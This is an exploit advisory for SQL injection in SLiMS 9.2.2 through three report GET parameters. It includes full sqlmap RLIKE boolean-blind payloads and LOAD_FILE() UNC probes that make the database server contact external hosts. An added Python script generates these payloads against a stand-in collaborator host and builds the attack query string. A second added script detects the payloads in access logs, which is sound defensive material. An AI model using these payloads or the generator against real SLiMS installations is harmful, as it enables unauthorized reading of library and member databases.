## Title: Senayan Library Management System (v9.2.2) a.k.a. SLIMS 9 Multiple SQLi - session cookie not properly sanitized.
## Author: nu11secur1ty
## Date: 12.20.2022
## Vendor: https://slims.web.id/web/
## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.2.2
## Reference:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.2/SQLi
## Description:
A SQL injection vulnerability exists at injection points 3, 4 and 5 of the manual test. At point 3 the following payload was submitted: `'+(select load_file('\\\\azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.stupid.com\\dzd'))+'`
The payload closes the string literal the application builds around the parameter value, inserts a sub-query that calls MySQL's LOAD_FILE() with a UNC path pointing at a host in an external domain, and reopens the literal so the query stays syntactically valid. The application was observed communicating with that domain, which shows that the injected SQL was executed by the database server.
Manual testing confirmed the injection in the class, collType and membershipType GET parameters.
An attacker could use it to read every column in the database.
The vulnerability is exploitable, and cookie values are not properly sanitized either.
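The following is an added example, written for this page and not taken from the advisory or from SLiMS, that builds the two payload shapes the advisory relies on: the LOAD_FILE() UNC probe (out-of-band confirmation) and sqlmap's RLIKE boolean-based blind form, and decodes the hex literals sqlmap emits so you can see which host the database server is asked to reach. The collaborator host `abc123.oob.example`, the share name and the string-built query in `rendered_sql()` are assumptions; the hex literal in `ADVISORY_HEX` is copied from the sqlmap output for the class parameter.

```python
import re
from urllib.parse import urlencode

# Assumed collaborator host and share for the examples; the advisory's own hosts
# are random labels under slims.web.id and are not reused here.
OOB_HOST = "abc123.oob.example"
OOB_SHARE = "nbq"

# Hex literal copied from the advisory's sqlmap output (class parameter), used
# only to show what the database server is asked to open.
ADVISORY_HEX = ("0x5c5c5c5c37313667623163666539676b6a61347a646a34357178783932303876"
                "776c6b636e30656e3662762e736c696d732e7765622e69645c5c6e6271")


def oob_load_file_payload(base_value: str, host: str, share: str) -> str:
    """Close the string literal, add a sub-select calling LOAD_FILE() on a UNC
    path, then reopen the literal so the surrounding query still parses."""
    # Inside a MySQL string literal a backslash escapes the next character, so
    # the SQL text \\\\host\\share is the UNC path \\host\share at runtime.
    unc = "\\\\\\\\" + host + "\\\\" + share
    return f"{base_value}'+(select load_file('{unc}'))+'"


def blind_rlike_payload(base_value: str, condition: str, tag: str) -> str:
    """sqlmap-style boolean-based blind payload (RLIKE in a WHERE clause).
    When `condition` is true the regexp is the hex-encoded original value and
    the row matches; otherwise it is 0x28, a lone '(', which is an invalid
    regexp, so the query errors out and the response changes."""
    hexed = "0x" + base_value.encode().hex()
    return (f"{base_value}' RLIKE (SELECT (CASE WHEN ({condition}) THEN {hexed} "
            f"ELSE 0x28 END)) AND '{tag}'='{tag}")


def hex_literals(sql: str) -> list[str]:
    """Decode every 0x... literal in a payload back to text (sqlmap hex-encodes
    string literals), which reveals the UNC hosts the server will contact."""
    found = []
    for m in re.finditer(r"0x([0-9a-fA-F]+)\b", sql):
        digits = m.group(1)
        if len(digits) % 2 == 0:          # odd-length hex is not a byte string
            found.append(bytes.fromhex(digits).decode("latin-1"))
    return found


def rendered_sql(class_value: str) -> str:
    """HYPOTHETICAL string-built query standing in for the application's own,
    which the advisory does not show; table and column names are made up."""
    return "SELECT * FROM t WHERE class = '" + class_value + "'"


def build_query_string(injected: dict) -> str:
    """Assemble the GET query string from the advisory around injected values,
    URL-encoding them as a client would (quote characters become %27)."""
    params = {"reportView": "true", "year": "2002"}
    params.update(injected)
    return urlencode(params)


if __name__ == "__main__":
    probe = oob_load_file_payload("bbbb", OOB_HOST, OOB_SHARE)
    print(rendered_sql(probe))
    print(blind_rlike_payload("a''", "7628=7628", "ckmk"))
    print(hex_literals(ADVISORY_HEX))
    print(build_query_string({"class": probe, "membershipType": "a", "collType": "aaaa"}))
```

Two caveats when reading the probe's result: LOAD_FILE() returns NULL unless the MySQL account has the FILE privilege and the path is readable, so the probe's value is the DNS or SMB interaction with the collaborator host, not any returned data; and a UNC path only triggers that interaction when the MySQL server itself runs on Windows, since on other platforms the backslashes are just characters of a relative filename.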
## STATUS: HIGH Vulnerability
[+] Payload:
```mysql
00
---
Parameter: class (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: reportView=true&year=2002&class=bbbb'+(select load_file('\\\\716gb1cfe9gkja4zdj45qxx9208vwlkcn0en6bv.slims.web.id\\nbq'))+''+(select load_file('\\\\1rtb9wq2997df8x4x2cdtmp4kvqoee255twjjb70.slims.web.id\\avg'))+'' RLIKE (SELECT (CASE WHEN (2920=2920) THEN 0x62626262+(select load_file(0x5c5c5c5c37313667623163666539676b6a61347a646a34357178783932303876776c6b636e30656e3662762e736c696d732e7765622e69645c5c6e6271))+''+(select load_file(0x5c5c5c5c3172746239777132393937646638783478326364746d70346b76716f656532353574776a6a6237302e736c696d732e7765622e69645c5c617667))+'' ELSE 0x28 END)) AND 'xMPZ'='xMPZ&membershipType=a''&collType=aaaa'+(select load_file('\\\\dctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id\\wtf'))+''+(select load_file('\\\\azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id\\dzd'))+'
---
01
---
Parameter: collType (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: reportView=true&year=2002&class=bbbb'+(select load_file('\\\\716gb1cfe9gkja4zdj45qxx9208vwlkcn0en6bv.slims.web.id\\nbq'))+''+(select load_file('\\\\1rtb9wq2997df8x4x2cdtmp4kvqoee255twjjb70.slims.web.id\\avg'))+'&membershipType=a''&collType=aaaa'+(select load_file('\\\\dctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id\\wtf'))+''+(select load_file('\\\\azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id\\dzd'))+'' RLIKE (SELECT (CASE WHEN (2279=2279) THEN 0x61616161+(select load_file(0x5c5c5c5c646374697930687a69777a643478756a6671716366643375756c306b6f61633166703666743968792e736c696d732e7765622e69645c5c777466))+''+(select load_file(0x5c5c5c5c617a6469746d3536316837666b7533796a39397573386e653235387a77706b676e346575316f70642e736c696d732e7765622e69645c5c647a64))+'' ELSE 0x28 END)) AND 'MGZY'='MGZY
---
03
---
Parameter: membershipType (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: reportView=true&year=2002&class=bbbb'+(select load_file('\\\\716gb1cfe9gkja4zdj45qxx9208vwlkcn0en6bv.slims.web.id\\nbq'))+''+(select load_file('\\\\1rtb9wq2997df8x4x2cdtmp4kvqoee255twjjb70.slims.web.id\\avg'))+'&membershipType=a''' RLIKE (SELECT (CASE WHEN (7628=7628) THEN 0x612727 ELSE 0x28 END)) AND 'ckmk'='ckmk&collType=aaaa'+(select load_file('\\\\dctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id\\wtf'))+''+(select load_file('\\\\azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id\\dzd'))+'
---
```
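From the defender's side, the payloads above leave distinctive traces in the web server's access log: a `load_file(` call, a UNC path either as a quoted literal or as a hex literal beginning `0x5c5c5c5c`, the `RLIKE (SELECT (CASE WHEN` construct, and sqlmap's closing `AND 'xxxx'='xxxx` tautology. The following added detection example (written for this page, not part of the advisory or of SLiMS) URL-decodes the request target of each log line and reports which of those indicators it contains. The log lines, the client addresses, the path `/report.php` and the host `host.oob.example` are all constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format access-log lines for the example. Line 1
# carries the LOAD_FILE() UNC probe, line 2 is a benign request, line 3 is the
# sqlmap RLIKE boolean-based blind payload with a hex-encoded UNC path.
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Dec/2022:10:15:01 +0000] "GET /report.php?reportView=true'
    '&year=2002&class=bbbb%27%2B(select%20load_file(%27%5C%5C%5C%5Chost.oob.example'
    '%5C%5Cnbq%27))%2B%27&membershipType=a&collType=aaaa HTTP/1.1" 200 5123 "-" "sqlmap/1.6"',
    '192.0.2.11 - - [20/Dec/2022:10:15:02 +0000] "GET /report.php?reportView=true'
    '&year=2002&class=bbbb&membershipType=a&collType=aaaa HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [20/Dec/2022:10:15:03 +0000] "GET /report.php?reportView=true'
    '&year=2002&class=bbbb%27%20RLIKE%20(SELECT%20(CASE%20WHEN%20(2920%3D2920)%20THEN'
    '%200x62626262%2B(select%20load_file(0x5c5c5c5c686f73742e6f6f622e6578616d706c655c5c6e6271))'
    '%20ELSE%200x28%20END))%20AND%20%27xMPZ%27%3D%27xMPZ HTTP/1.1" 200 211 "-" "sqlmap/1.6"',
]

INDICATORS = {
    # LOAD_FILE() call, the out-of-band probe used in the advisory
    "load_file": re.compile(r"load_file\s*\(", re.I),
    # UNC path as a quoted literal ('\\\\host\\share') or as a hex literal
    # whose first four bytes are backslashes (0x5c5c5c5c)
    "unc_path": re.compile(r"'\\\\\\\\[^']+'|0x5c5c5c5c[0-9a-f]*", re.I),
    # sqlmap's RLIKE boolean-based blind construct
    "rlike_case": re.compile(r"rlike\s*\(\s*select\s*\(\s*case\s+when", re.I),
    # sqlmap's closing tautology, e.g. AND 'xMPZ'='xMPZ
    "sqlmap_tail": re.compile(r"and\s+'(\w{4})'\s*=\s*'\1(?!\w)", re.I),
}

# client address, then the request target between "GET " and " HTTP/"
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/')


def decode_target(line: str):
    """Return (client, URL-decoded request target) or (None, None) if the line
    is not a request line. Decoding first matters: the payload arrives as %27,
    %5C and %2B, which the raw patterns would not match."""
    m = REQUEST_RE.match(line)
    if not m:
        return None, None
    return m.group(1), unquote_plus(m.group(2))


def scan_log(lines):
    """Return one record per suspicious line: its number, the client address
    and the names of the indicators found in the decoded request target."""
    hits = []
    for n, line in enumerate(lines, 1):
        client, target = decode_target(line)
        if target is None:
            continue
        found = [name for name, rx in INDICATORS.items() if rx.search(target)]
        if found:
            hits.append({"line": n, "client": client, "indicators": found})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']} from {hit['client']}: {', '.join(hit['indicators'])}")
```

A single indicator such as `load_file(` is enough to alert on, since no legitimate request to a report page carries it; the combination of all four on one line is the signature of an automated sqlmap run and is worth correlating with the source address across the whole log.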
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.2/SQLi)
## Reference:
[Using HTTP Cookies](https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies)
## Evidence and Exploit
[href](https://streamable.com/1m0y6c)
## Time spent
`00:35:00`
## Write an exploit
`00:15:00`